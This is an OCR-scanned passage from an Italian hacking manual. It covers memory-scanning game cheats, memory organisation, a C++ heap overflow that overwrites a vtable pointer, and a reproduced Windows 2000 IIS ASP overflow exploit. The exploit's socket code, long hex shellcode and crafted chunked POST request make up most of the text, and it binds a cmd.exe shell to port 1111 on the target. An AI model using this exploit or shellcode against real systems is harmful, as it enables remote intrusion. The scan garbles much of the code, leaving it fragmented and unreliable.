0020-Event (0x8138ECE0) 

0024 -Port (0xE2F81B10) 

0028 - Mutant VNIsCacheMutant (0x8180EB20) 

002C-Section (0xE12G84F0) 

0030-Event (0x81330DE0) 

0034 - Windows tation W/indowsW/indowStations\WinStaO (0x81 
0038 -Desktop (0x31884F78) 

003C -WindowS tation \Windows\WindowStations\WinStaO (0x81 

0040 - Key HKLM (0xE30C4B00) 

0044 - Directory \.BaseNamedObjects (0x81888GD0) 

0048-Event (0x81GFD7E0) ■ 

nniT-Fwpnh rnvfiiR?r j wm -U 





Un tipo di strumenti molto particolari sono quelli che eseguono una fotografia della memoria e 
successivamente permettono di identificare determinate locazioni nelle quali vengono a 
trovarsi certi valori. 

Uno degli usi molto frequenti di questo tipo di programmi è quello relativo alla ricerca dei 

punti in memoria dove sono presenti dei valori particolari relativi a determinati giochi. 

Per portare un esempio pratico posso riferirmi ad una situazone personale che mi aveva 

portato a utilizzare uno di questi software. 

Mi riferisco al gioco CAESAR III. 

Durante lo svolgimento del gioco vengono dati un ceryo numero di DENARI necessari per 
eseguire le costruzioni pubbliche nell'ambito dele comunità gestite nel gioco. 
Una volta terminati i soldi non è più possibile andare avanti. 

A questo punto mediante il programma RAMCHEAT esegui una ricerca di tutte quelle 
locazioni di memoria usate dal programma in cui si trovava il numero relativo ai DENARI da 
me posseduti. 
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Duranyte la creazione di un nuovo progetto il programma richiede di selzionare il programma 
che si vuole mettere in analisi. 
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Una volta selzionato il processo è possibile richiedere una fotografia della memoria relativa a 
tutte quelle locazioni in cui è presente il valore ricercato. 

Una volta specificato il valore, il numero delle locazioni in cui questo potrebbe essere 
presente può di fatto essere elevatissimo. 

HI 
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Questo è il motivo per cui certe ricerche si fanno mediante due passi. 

Durante il primo passaggio vengono identificate tutte le locazioni che contengono un certo 

valore. 

Successivamente si fa in modo che iul valore cambi in modo che successivamente può 
essere eeguita una ricerca al fine di rovare quali delle locazioni che prima contenevano il 
valore oroginale di fatto abbiano a questo punto cambiato il valore con quello ricercato. 



«*RAM Cheat - Progett (Sqlservr) 



File Edit Memory Help 



Nq,° 


Memory Address 


Value On Last 5can 




i 1 


A16A58 


1200 




2 


7799F010 


1200 




2 mermory addresses are lished. 



Nel caso del gioco di cui parlavo la rcerca iniziale era stata fatta mediante il numero di denari 
di quell'istante overo 1200. 

Appena finita la ricerca iniziale veniva costruita una casa in modo che il totale dei denari 
scendesse del costo di questa. 

Una volta ottenuto il nuovo importo questo veniva utilizzato per vedere quali locazioni che 
inizialemnte contenevano i denari iniziali a quel punto erano variati. 

Chiaramente l'uso di questi programmi ha come scopo quello di trovare cheats nei giochi ma 
questi possono essere anche utilizzati nall'ambito dell'hacking per ricercare determinate 
locazioni di mamoria dove sono contenuti valori particolari. 



L'organizzazione della memoria 

Come argomento questo non è direttamente legato all'hacking ma di fato ho notato che 
affrontando determinati discorsi, come ad esempio quelli legati ai buffers overflow, certi 
concetti erano complessi da comprendere per tutte quelle persone che non avevano mai 
avuto a che fare direttamente con quella che è l'organizzazione della memoria. 
Tutti sanno che questa all'interno di un sistema può essere considerata come una sequenza 
di contenitori numerati da 0 alla dimensione massima di questa dentro a ciascuno dei quali 
vengono memorizzati dei numeri i quali rappresentano i dati e i codici delle istruzioni che il 
processore è in grado di eseguire. 

La sua gestione, dal punto di vista elettronico, ha subito negli anni un certo numero di 
modifiche tutte legate alle esigenze tecniche che le soluzioni adottate permettevano di 
gestire. 
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Se di fatto accettiamo questo concetto che ci rappresenta la memoria come una sequenza di 
contenitori è chiaro che per forza ci devono essere determinati meccanismi legati alla 
gestione di questi. 

Il primo meccanismo deve essere per forza un sistema idoneo a trasferire da e verso una 
certa casella i valori trattati. 

Il secondo meccanismo invece dove essere quello che nell'ambito di un trasferimento dice 
quale casella è interessata nell'operazione. 

Questi due meccanismi ci portano ad ipotizzare che in questo meccanismo di gestione della 
memoria ci deve essere necessariamente un buffer adatto a trasferire i dati ed uno idoneo a 
indirizzare le celle di memoria. 

Fino dai primi tempi in cui questo sistema venne implementato dentro ai sistemi informatici ci 
si trovò davanti a quelli che venivano definiti con i termini di DATA BUS e ADDRESS BUS. 
Concettualmente il principio era semplice da concepire. 

I valori espressi come BYTES, ovvero come numeri rappresentati da numeri binari, 
utilizzavano un fascio di conduttori per essere trasferiti dalla memoria verso la CPU, dalla 
CPU verso la memoria e da questi due entità verso i gestori dei sistemi di I/O indirizzati a 
gestire le periferiche collegate al sistema. 

Trattandosi di BYTES ovvero numeri rappresentati da 8 BITS avremmo potuto al limite 
concepire il databus come un conduttore a 8 fili su ciascuno dei quali veniva trasferito un BIT 
del valore. 

II concetto invece legato alla rappresentazione dell'indirizzo atto ad indicare la cella 
interessata in un operazione di lettura/scrittura della memoria, ha subito negli anni alcune 
evoluzioni legate alle limitazioni elettroniche che i sistemi disponevano nei primi anni. 

Come tutti sappiamo per rappresentare un numero seriore a 65368 dovremmo avere a 
disposizione un numero di bits superiore a 16. 

Se i sistemi fossero nati con le stesse caratteristiche di quelli attuali non avremmo dovuto 
adottare alcuni escamotage per riuscire ad indirizzare quantità di memoria superiori a 64K. 
Infatti al giorno d'oggi parliamo di indirizzi a 32 BITS in grado quindi di rappresentare valori 
compresi tra 0 e più di 4 miliardi. 

Anni fa invece i processori erano a 8 BITS, come nel caso delle CPU INTEL 8088, e gli 
address bus erano costituiti da 20 BITS. 

I chips utilizzati per gestire le memorie erano anche questi limitati come capacità. 
Ogni CHIP era in grado di possedere 64KB di celle. 

A questo punto se per indirizzare 64KB erano necessari 16 BITS cosa veniva fatto per avere 
640 KB di RAM nel sistema ? 

Chiaramente non era pensabile utilizzare 16 cavi per arrivare ad ogni CHIP da 64 KB per cui 
l'address bus a 20 bits veniva utilizzato in un modo particolare. 

I primi 16 bits arrivavano a tutti i chips per cui se su questi veniva inserito un indirizzo tutti i 
chips ricevevano questo valore. 

I 4 bits superiori andavano ad un decoder il quale abilitava il chip che era interessato ad 
interpretare l'indirizzo. 

Essendo il sistema di indirizzamento capace di rappresentare solo valori fino a 64KB venne 
usato il concetto di segmento inteso come numero di partenza da cui contare 64KB. 
Questo concetto venne ereditato dal software il quale a livello assembler lo portò avanti fino 
ai giorni nostri a tutti i livelli. 

I compilatori nell'ambito degli indirizzamenti di memoria concepivano diversi segmenti come 
ad esempio il segmento del codice (CODE SEGMENT), il segmento dei dati (DATA 
SEGMENT) e cosi via. 

Per poter gestire questi indirizzi vennero inseriti all'interno del processore dei registri 
particolari atti a rappresentare questi valori in modo tale che se all'interno del programma gli 
indirizzamenti venivano fatti tramite valori a 16 bits, il valore del segmento di fatto veniva 
preso da questi . 

Ad esempio la rappresentazione del CODE SEGMENT è compito del registro CS, quello del 
DATA SEGMENT è di DS. 

In altre parole se in un certo punto di un programma in memoria veniva fatto riferimento ad un 
offset di fatto l'indirizzo era concepito come DS:OFFSET (o CS:OFFSET). 
Questi due registri sono utilizzati per quello che riguarda il codice e i dati. 
Altri registri particolari vengono utilizzati per la gestione dello stack. 

Lasciando perdere un attimo i concetti fisici legati alla gestione della memoria, la codifica dei 
programmi e il loro metodo di gestione ha reso necessari determinati escamotage come ad 
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esempio delle zone di memoria in cui i dati inseriti per prima di fatto sono gli ultimi ad essere 
estratti. 

Pensate ad una zona di memoria che funziona come lo spunzone delle consumazioni dei bar. 
Se su questo dovessimo inserire un certo numero di biglietti di fatto il primo ad essere inserito 
diventerebbe l'ultimo e pater essere estratto. 

La gestione logica dei programmi ha sempre necessitato di una zona di memoria che venisse 
gestita in questo modo. 

Come saprete i programmi sono costituiti di sequenze di istruzioni scritte in un determinato 
linguaggio le quali possono essere anche raggruppate all'interno di quelle che vengono 
definite con il termine di funzioni. 

Quando si desidera eseguire una determinata sequenza di istruzioni atte ad eseguire una 
certa funzionalità è sufficiente richiamare per nome una determinata funzione. 
In questo caso l'esecuzione sequenziale delle istruzioni si interrompe e il programma passa, 
o meglio salta, all'indirizzo di dove si trova la funzione interessata. 




Chiaramente quando il programma salta alla funzione deve inserire da qualche parte 
l'indirizzo di dove il tutto deve ritornare quando la funzione stessa termina. 
Lo stack server appunto a questo. 

Ogni volta che si incontra una chiamata ad una funzione il sistema memorizza nello stack 
l'indirizzo di ritorno in modo che quando questa termina l'indirizzo di ritorno viene estratto e 
riutilizzato all'interno del INSTRUCTON POINTER ovvero il registro EIP quello che mantiene 
all'interno del processore l'indirizzo correntemente eseguito. 

Lo stack viene anche utilizzato per altri scopi come ad esempio la memorizzazione delle 
variabili locali alle funzioni. 

Come abbiamo detto in altri capitoli nella progettazione del software quando si cerca di 

valutare le dimensioni delle variabili possono verificarsi diversi casi. 

Nella sintassi relativa alla dichiarazione di una variabile in linguaggi come il C ci troviamo : 



classe_di_memoria tipo nome_variabile; 



La classe di memoria dice al compilatore in quale zona di memoria deve essere allocata la 
variabile. 

Se non viene fatta nessuna specifica il compilatore adatta alla circostanza questo parametro 
ovvero esegue quella che è la procedura di allocazione automatica delle variabili. 
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Se la variabile viene dichiarata dentro ad una funzione la varabile viene definita dentro al 
segmento di stack. 

Se la dichiarazione è globale il suo spazio viene definito dentro ad un datasegment. 

La specifica static davanti ad una variabile locale fa si che l'allocazione non sia più dentro alo 

stack ma dentro ad un segmento di dati statico. 

Alcune volte seguito della valutazione fatta in fase di analisi è possibile stabilire la dimensione 
massima che una variabile potrà raggiungere durante il funzionamento del software dentro al 
quale questa è definita. 

In altri casi non è possibile a priori fare questo tipo di valutazione per cui è possibile utilizzare 
un ulteriore tipo che linguaggi come il C possiedono. 

Questo è il tipo puntatore ovvero la variabile definita serve di fatto a contenere un indirizzo di 
una zona di mamoria. 

In altre parole mediante una procedura di allocazione dinamica della memoria viene riservato 
da qualche parte una certa dimensione di questa e l'indirizzo di dove questa inizia viene 
memorizzato dentro alla variabile puntatore. 

Se ad esempio ad un certo punto avessimo bisogno di avere un array con 4096 bytes 
potremmo fare : 



La funzione malloc() allocherebbe da qualche parte della memoria la dimansione specificata 
come argomento e l'indirizzo verrebbe successivamente memorizzato all'interno del 
puntatore buffer. 

In questo caso la memoria viene allocata dentro ad un ennesimo tipo di segmento ovvero in 
quello spazio chiamato HEAP. 

Avevamo detto che in fase di LINK è possibile specificare la dimensione dello stack che 
generalmente di default è sempre 2048 bytes. 

Esiste una specifica del clinker che permette di modificare anche la dimensione dell'heap. 

Parlando di buffer overflow avevamo detto che in molti casi lo spazio da assaltare è all'interno 

dell'heap proprio per il fatto che spesso all'interno dei programmi lo spazio di memoria viene 

allocato dinamicamente e successivamente rilasciato quando questo non server più. 

Lo stesso metodo di gestione della memoria è quello utilizzato nei nuovi linguaggi object 

oriented quando si crea dinamicamente una classe. 

Quando ci troviamo davanti a : 



di fatto il sistema crea dinamicamente lo spazio in cui inserire la classe. 

In relazione allo sconfinamento che è possibile eseguire dentro all' HEAP vediamo ora come 

di fatto mediante l'instanziamento automatico di due classi, dentro a una delle quali esiste un 

oggetto statico che viene overflowed, è possibile eseguire questa funzione. 

Questo metodo sovrascrive quella definita con il termine di vtable pointer ovvero il 

virtual-function table pointer all'interno della seconda classe. 



// class_tresl . cpp 
//application . 



Defines the entry point for the console 



^include "stdafx.h" 
^include <stdio .h> 
^include <string.h> 

class testi 



public : 



char name [10] ; 
virtual -testi (), 
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virtual voi 



}; 



class test2 
{ 

public: 

char name [10] ; 
virtual ~test2 () ; 
virtual void run(); 



main(int argc, char* argv[]) 



int mairi 
{ 



class testi 
class testi 
class test2 
class test2 



*tl = new class testi; 

*t5 = new class testi; 

*t2 = new class test2; 

*t3 = new class test2; 



////////////////////////////////////// 
// overwrite t2's virtual function 
// pointer w/ heap address 
// 0x00301E54 making the destructor 
// appear to be 0x77777777 
// and the run () function appear to 
// be 0x88888888 
////////////////////////////////////// 

strcpy (t3->name, "\x77\x77\x77\x77\x88\x88\x88\x88XX XXX* 
XXXXXXXXXX XXXXXXXXXX XXXXXXXXXX XXXX\x54\xlE\x30\x00") ; 



// causes destructor 0x77777777 to be called 



:run () 



testi: : ~testl () 



/oid test 2 : :run () 



puts ("hey") ; 



test2: :~test2 () 



Mediante il metodo usato all'interno del programma visto l'attaccante può creare una nuova 
virtual function table nel buffer controllato. 
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? W indows 2 000 Server MS 5.0 .A S P Overf low Exploit 



Uscito recentemente è un bugs che affligge il sistema di gestione ASP. 

Questo tipo di exploit apre la porta 1 1 1 1 e apre una shell and bind the cmd.exe su questa. 



Windows 2000 Server Exploit By CHINANSL Security Team. 

on Windows 2000 Chinese Version, US 5.0 , not patched. 
ing:THIS PROGRAM WILL ONLY 



CHINANSL Technology 
keji@chinansl . corei 



CO. ,LTD 



http : / /www . chinans 



*/ 



ched. 
TEST. 



# include 
^include 
lude 
lude 
^include 
#pragma 



#incli 
#incli 



int 
{ 

if (arge 
{ 

printf("%s 
printf(" 
uts(" 



main (int 



comment 
arge, 



"stdafx.h" 
<stdio.h> 
<stdlib.h> 
<string.h> 
<windows . h> 
(lib, "Ws2_32") 



char* 



i = 



• 



ip port 
ie. %s 127.0.0.1 80 
programed by 



aspfilepath \n\n", argv[0 ] ) ; 
/ iisstart . asp \n ", argv[0 ] ) ; 
kejiQchinansl . com") ; 



return 



DWORD 
//address 
DWORD 



jmpaddr=0x00457494; 



V"\xlc\xfb\xe6\x01 "; 



srcdata=0x01e2±blc-4; // 0x00451 41 4; 
Of SHELLCODE 
//0xllebf094; / /0x01e6fcec; 

//"\x0c\xfb\xe6\x01 "; 



char* destIP=argv [ 1 ] ; 

char* destFile=argv [3] ; 

int webport =atoi ( argv [2] ) ; 

char* pad="\xcc\xcc\xcc\xcc" "ADPA " " \x02\x02\x02\x02" "PADP"; 
bytes 



WSADATA 

SOCKET 

long 

if (WSAStartup (0x0101 , Sws) 
{ 

puts ( "WSAStartup () 
return 



: 



ict sockaddr_in 
addr . sin_family=AF_INET; 
addr . sin_port=htons (webport) ; 
addr . sin_addr . s_addr=inet_addr (destIP) ; 
s=socket (AF_INET, SOCK_ S TREAM, 0) ; 
if(s==-l) 



result=0 ; 

0, 

error") ; 

-i; 



addr 



"Socket 
n 



create 



error") ; 
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host 



"); 
-i; 



char 
char* 
shellcode- 
c9\x89" 



buff[4C 

" \x55 \x8b \xec \x33 \xcO \xbO \xfO \xf7 \xd8 \x03 \xeO \x8b \xfc \i 



x8d 


\x2c 


\xff 


\xff 


\xff 


\xb8 


\x6b 


1x55 


\x72 


x5e 


xab 


\xb8 


\x65 


t x6c 


\x33 


\x32 " 


xab 


\x32 


\xcO 


xaa 


\xb8 


\x77 


\x73 


\x6f 


\x63 


xab 


\xb8 


\x6b 


\x33 


\x32 


\x2e 


\xab" 


x4f 


\x32 


\xcO 


xaa 


\x8d 


\x7d 


\x80 


\xb8 


\x63 


\x6d 


\x64 


\x2e 


xab 


\x32 


IxcO 


\x4f" 


X3L3L 


\xb8 


\x23 


\x80 


\xb7 


\x77 


\x8d 


\x9d 


\xlO 


\xff 


\xff 


\xff 


\x53 


\xff 


\xd0 


\x89" 


x45 


: xfc 


\xb8 


\x23 


\x80 


\xb7 


\x77 


\x8d 


\x9d 


\xl9 


\xff 


\xff 


\xff 


\x53 


\xff 


\xd0 " 


x89 


\x45 


\xf8 


\xbb 


\x4b 


\x56 


\xe7 


\x77 


x6a 


\x47 


\xff 


1x75 


t xfc 


\xff 


\xd3 


\x89" 


x45 


\xf4 


x6a 


\x48 


\xff 


\x75 


,xfc 


\xff 


\xd3 


\x89 


\x45 


\xf 0 


\x33 


\xf6 


\x66 


\xbe " 


xld 


\x02 


\x56 


\xff 


1x75 


: xfc 


\xff 


\xd3 


\x89 


\x45 


,xec 


\x66 


xbe 


\x3e 


\x02 


\x56" 


xff 


\x75 


,xfc 


\xff 


\xd3 


\x89 


\x45 


\xe8 


\x66 


xbe 


\xOf 


\x03 


\x56 


\xff 


\x75 


\xfc" 


xff 


\xd3 


\x89 


\x45 


: xe4 


\x66 


xbe 


\x9d 


\x01 


\x56 


\xff 


\x75 


: xfc 


\xff 


\xd3 


\x89" 


x85 


\x34 


\xff 


\xff 


\xff 


\x66 


xbe 


t xc4 


\x02 


\x56 


\xff 


\x75 


t xfc 


\xff 


\xd3 


\x89" 


x85 


\x28 


\xff 


\xff 


\xff 


\x33 


\xcO 


\xbO 


\x8d 


\x50 


\xff 


\x75 


t xfc 


\xff 


\xd3 


\x89" 


x85 


\xl8 


\xff 


\xff 


\xff 


,x6a 


1x73 


\xff 


1x75 


\xf8 


\xff 


\xd3 


\x89 


\x45 


\xe0 


\x6a " 


xl7 


\xff 


\x75 


\xf8 


\xff 


\xd3 


\x89 


\x45 


xdc 


x6a 


\x02 


\xff 


\x75 


\xf8 


\xff 


\xd3" 


x89 


\x45 


\xd8 


\x33 


\xcO 


\xbO 


\xOe 


\x48 


\x50 


\xff 


1x75 


\xf8 


\xff 


\xd3 


\x89 


\x45" 


xd4 


x6cL 


\x01 


\xff 


1x75 


\xf8 


\xff 


\xd3 


\x89 


\x45 


\xdO 


x6a 


\xl3 


\xff 


1x75 


\xf8 " 


xff 


\xd3 


\x89 


\x45 


L xcc 


,xSa 


\xlO 


\xff 


\x75 


\xf8 


\xff 


\xd3 


\x89 


\x45 


\xc8 


\x6a " 


x03 


\xff 


1x75 


\xf8 


\xff 


\xd3 


\x89 


\x85 


xlc 


\xff 


\xff 


\xff 


\x8d 


\x7d 


\xa0 


\x32 " 


xe4 


\xbO 


\x02 


\x66 


xab 


\x66 


\xb8 


\x04 


\x57 


\x66 


xab 


\x33 


\xc0 


xab 


\xf7 


\xd0 " 


xab 


xab 


\x8d 


\x7d 


\x8c 


\x33 


\xcO 


\xbO 


\xOe 


\xfe 


\xc8 


\xfe 


\xc8 


xab 


\x33 


\xc0 " 


xab 


\x40 


xab 


\x8d 


\x45 


\xbO 


\x50 


\x33 


\xcO 


\x66 


\xb8 


1x02 


\x01 


\x50 


\xff 


\x55 " 


xeO 


\x33 


\xcO 


\x50 


x6a 


\x01 


x6a 


\x02 


\xff 


\x55 


xdc 


\x89 


\x45 


t xc4 


,xSa 


\xl0" 


x8d 


\x45 


\xaO 


\x50 


\xff 


\x75 


t xc4 


\xff 


\x55 


\xd8 


x6a 


\x01 


\xff 


1x75 


t xc4 


\xff" 


x55 


\xd4 


\x33 


\xcO 


\x50 


\x50 


\xff 


\x75 


,xc4 


\xff 


\x55 


\xd0 


\x89 


\x45 


\xc0 


\x33 " 


xff 


\x57 


\x8d 


\x45 


\x8c 


\x50 


\x8d 


\x45 


\x98 


\x50 


\x8d 


\x45 


\x9c 


\x50 


\xff 


\x55 " 


xf4 


\x33 


\xff 


\x57 


\x8d 


\x45 


,x8c 


\x50 


\x8d 


\x45 


\x90 


\x50 


\x8d 


\x45 


\x94 


\x50 " 


xff 


\x55 


\xf4 


,xfc 


\x8d 


\xbd 


\x38 


\xff 


\xff 


\xff 


\x33 


\xc9 


\xbl 


\x44 


\x32 


\xc0 " 


xf3 


\xaa 


\x8d 


\xbd 


\x38 


\xff 


\xff 


\xff 


\x33 


\xcO 


\x66 


\xb8 


1x02 


1x02 


\x89 


\x47" 


x2c 


\x8b 


\x45 


\x94 


\x89 


\x47 


\x38 


\x8b 


\x45 


\x98 


\x89 


\x47 


\x40 


\x89 


\x47 


\x3c" 


xb8 


\xfO 


\xff 


\xff 


\xff 


\x33 


\xdb 


\x03 


\xeO 


\x8b 


\xc4 


\x50 


\x8d 


\x85 


\x38 


\xff" 


xff 


\xff 


\x50 


\x53 


\x53 


\x53 


\x6a 


\x01 


\x53 


\x53 


\x8d 


\x4d 


\x80 


\x51 


\x53 


\xff" 


x55 


\xfO 


\x33 


\xcO 


\xb4 


\x04 


\x50 


\x6a 


\x40 


\xff 


\x95 


\x34 


\xff 


\xff 


\xff 


\x89" 


x85 


\x30 


\xff 


\xff 


\xff 


\x90 


\x33 


\xdb 


\x53 


\x8d 


\x85 


\x2c 


\xff 


\xff 


\xff 


\x50 " 


x53 


\x53 


\x53 


\xff 


\x75 


\x9c 


\xff 


\x55 


\xec 


\x8b 


\x85 


\x2c 


\xff 


\xff 


\xff 


\x85 " 


xcO 


\x74 


\x49 


\x33 


\xdb 


\x53 


\xb7 


\x04 


\x8d 


\x85 


\x2c 


\xff 


\xff 


\xff 


\x50 


\x53 " 


xff 


\xb5 


\x30 


\xff 


\xff 


\xff 


\xff 


1x75 


\x9c 


\xff 


1x55 


\xe8 


\x85 


\xc0 


1x74 


\x6d" 


x33 


\xcO 


\x50 


\xff 


\xb5 


\x2c 


\xff 


\xff 


\xff 


\xff 


\xb5 


\x30 


\xff 


\xff 


\xff 


\xff" 


x75 


\xcO 


\xff 


\x55 


\xcc 


\x83 


\xf8 


\xff 


\x74 


\x53 


\xeb 


\xl0 


\x90 


\x90 


\x90 


1x90" 


x90 


\x90 


\x6a 


\x32 


\xff 


\x95 


\x28 


\xff 


\xff 


\xff 


\xeb 


\x99 


\x90 


\x90 


\x33 


\xc0 " 


x50 


\xb4 


\x04 


\x50 


\xff 


\xb5 


\x30 


\xff 


\xff 


\xff 


\xff 


\x75 


\xc0 


\xff 


\x55 


\xc8 " 


x83 


\xf8 


\xff 


\x74 


\x28 


\x89 


\x85 


\x2c 


\xff 


\xff 


\xff 


\x33 


\xc0 


\x50 


\x8d 


\x85 " 


x2c 


\xff 


\xff 


\xff 


\x50 


\xff 


\xb5 


\x2c 


\xff 


\xff 


\xff 


\xff 


\xb5 


\x30 


\xff 


\xff" 


xff 


\xff 


1x75 


\x90 


\xff 


\x55 


\xe4 


\x85 


\xcO 


\x74 


\x02 


\xéb 


\xb4 


\xff 


1x75 


\xc4 " 


xff 


\x95 


1x2 c 


\xff 


\xff 


\xff 


\xff 


\x75 


\xcO 


\xff 


\x95 


\xlc 


\xff 


\xff 


\xff 


\x6a " 




\xff 


\x95 


\xl8 


\xff 


\xff 


\xff"; 



















char* 
char* 



sl="POST 



";// 



s2="Accept: 



HTTP/1 . 1 \r\n"; 
*/*\r\n"; 
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char* s4="Content-Type : 

form-urlencoded\r\n "; 
char* 

chunked\r\n\r\n" ; 
char* 

char 

memset (shellcodebuff, 0x90, sizeof 
(shellcodebuff) ) ; 

memcpy (ishellcodebuff [sizeof (shellcodebuff) - 
strlen (shellcode) -1 ] , shellcode, strlen (shellcode) ) ; 
shellcodebuff [sizeof (shellcodebuff) -1 ] 



sfer-Encoc 
sc="0\r\n\r\n\r\n"; 
shellcodebuff [1 024 *8] 



har 

temset (sendbuff, 0, 1024*16) ; 



sendbuff[l 024 *1 6] , 



sprint f (s 
%s\r\n%si 
shellcode 



orintf (sendbuff , "%s%s?%s HTTP/1 . 1 \r\n%sHost 

ì%s%sl0\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s", si, destFile 
iebuff, s2, destIP, s4, s 5, pad/*, srcdata, jmpaddr*/, se) 



< 



int 

* (DWORD 

result=send(s, sendbuff, sendlen, 0) ; 
if(result 

puts("Send 
return 
} 



*) strstr (sendbuff, "BBBB ") 
*) strstr (sendbuff, "AAAA ") 



shellcode 



sendlen=strlen (sendbuff) ; 

= jmpaddr; 
= srec 



-1 



errori ") , 



emset (buff, 0, 4096) ; 
sult=recv (s, buff, sizeof (buff) , 0) ; 



if (strstr (buff , "<html>") 
< 

shutdown (s, 0) ; 
closesocket (s) ; 



i = 



NULL) 



puts ("Send shellcode errori Try againì") ; 

return 

shutdown (s, 0) ; 
closesocket (s) ; 

printf ("\nUse <telnet %s 1111> to connect to the host \n" , destIP) 
puts("If you cannot connect to the host, try run this pro$ 
again!"); 



return 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



